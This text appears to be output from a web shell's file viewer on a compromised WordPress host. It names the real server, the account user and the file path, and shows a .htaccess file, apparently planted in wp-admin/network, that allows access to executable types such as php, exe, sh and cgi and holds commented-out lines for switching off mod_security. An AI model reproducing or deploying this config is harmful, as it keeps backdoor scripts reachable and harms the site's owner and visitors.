HEX
Server: Apache
System: Linux br80.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User: bloga741 (1102)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: /home1/bloga741/upmagicbox.com/wp-admin/network/.htaccess
# OVH Safe .htaccess - Allow common file types

# Prevent access to .htaccess itself
<Files .htaccess>
  Order allow,deny
  Deny from all
</Files>

# <IfModule mod_security.c>
#   SecFilterEngine Off
#   SecFilterScanPOST Off
# </IfModule>

<FilesMatch "\.(php|phps|php5|phtml|html|js|css|jpg|jpeg|png|gif|svg|webp|zip|rar|exe|sh|pl|py|cgi|txt|pdf)$">
  Order allow,deny
  Allow from all
</FilesMatch>

# php_flag engine on  # DO NOT USE ON OVH (causes 500 error)